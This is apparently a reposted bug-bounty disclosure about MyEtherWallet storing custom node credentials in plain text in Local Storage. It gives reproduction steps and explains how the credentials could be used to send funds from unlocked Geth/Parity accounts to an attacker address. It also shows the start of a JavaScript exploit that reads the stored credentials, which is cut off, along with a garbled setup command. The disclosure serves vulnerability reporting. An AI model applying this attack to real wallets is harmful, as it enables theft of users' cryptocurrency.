Site icon API Security Blog

MyEtherWallet: Local Storage Custom Node Credentials Leak

## Summary

Credentials for a custom node are stored in plain text inside Local Storage on the user’s machine. If this node is configured in a certain way this could lead to the theft of any funds in accounts attached to this node, by a local attacker. And if not configured this way, an attacker could still perform Denial of Service type attacks on the node as well as violate the user’s privacy by revealing their public addresses.

## Steps To Reproduce

1. Access a wallet via MyEtherWallet (not using MetaMask, since then can’t select custom node).
2. Add a new custom network, with a username and password.
1. In “Network” box, click “Change”
2. Toggle “Add Custom Network/Node” on
3. Enter ETH node name: test
4. Enter URL: https://127.0.0.1
5. Enter Port: 4000
6. Toggle “HTTP Basic Access Authentication” on
7. Enter User Name: user
8. Enter Password: secretword
9. Click Save
3. Refresh page
4. Open Local Storage
– In Firefox, press F12, click on Storage, then Local Storage, then https://myetherwallet.com
5. Under customNetworks you should see the User Name and Password used to connect to the node, in plain text.

## What Could an Attacker Do With These Credentials?

These credentials can be used to access a custom node that requires authentication in order to interact with it. With these credentials one could make calls to the node via its JSON RPC API. For some nodes the worst consequence of this would be an attacker making lots of API calls to the node, in a Denial of Service type attack. However, for some node configurations this could result in the theft of users’ funds.

With both Geth and Parity nodes it is possible to add accounts to the node (i.e. Ethereum public addresses), with the password to decrypt the private key stored somewhere on the file system. The owner of the node can then unlock these accounts. In this configuration one can make HTTP requests to the node via its JSON RPC interface, including requests that perform privileged actions such as sending transactions on behalf of unlocked accounts attached to the node, with no further authentication required if these accounts are in an unlocked state. Detailed steps of this process are provided below.

Setting up node, using Parity:
1. Install the Parity CLI: `bash –password `
– jsonrpc port is non-default since I have read that there are bots that scan for unlocked accounts on the default port.
– jsonrpc-cors and jsonrpc-hosts options are set to all to make things easier, although in practice these might use a whitelist. However it is likely that the local machine would pass this whitelist check, if a user previously connected to the node from that computer.
– It will take a while for the node to sync to the network if this is the first time it is being run.
4. Transfer some Ropsten to the account, at least as much as the value used when sending a transaction in the exploit below (currently set to 0.001 ETH).

Note: In order to connect to this node via MyEtherWallet the connection must be via HTTPS. To do this I used a proxy server that converts incoming HTTPS request to HTTP requests, then forwards them to this parity node. I have included instructions for this in the attached file “Setup HTTPS Proxy Using Self-signed Certificate.md”. Note: I have found that MyEtherWallet produces error messages when attempting to add a custom node with credentials, however this does not affect this exploit.

With the Parity node set up, one can now run the exploit. The JavaScript code below assumes that the target node has been added to MyEtherWallet, and so is in “customNetworks” in Local Storage. The code below iterates through all nodes in “customNetworks” that require authentication and for each one gets a list of addresses attached to the node. Then for each of these addresses it attempts to send a transaction to an attacker controlled address. It could be adapted to find out the balance of the account and steal the entirety of the funds. This code should be copy-pasted into the JavaScript console on the target’s machine while on the MyEtherWallet home page (don’t need to be accessing a wallet):
“`javascript
var networks = JSON.parse(localStorage.customNetworks);
for (let i = 0; i Read More

Exit mobile version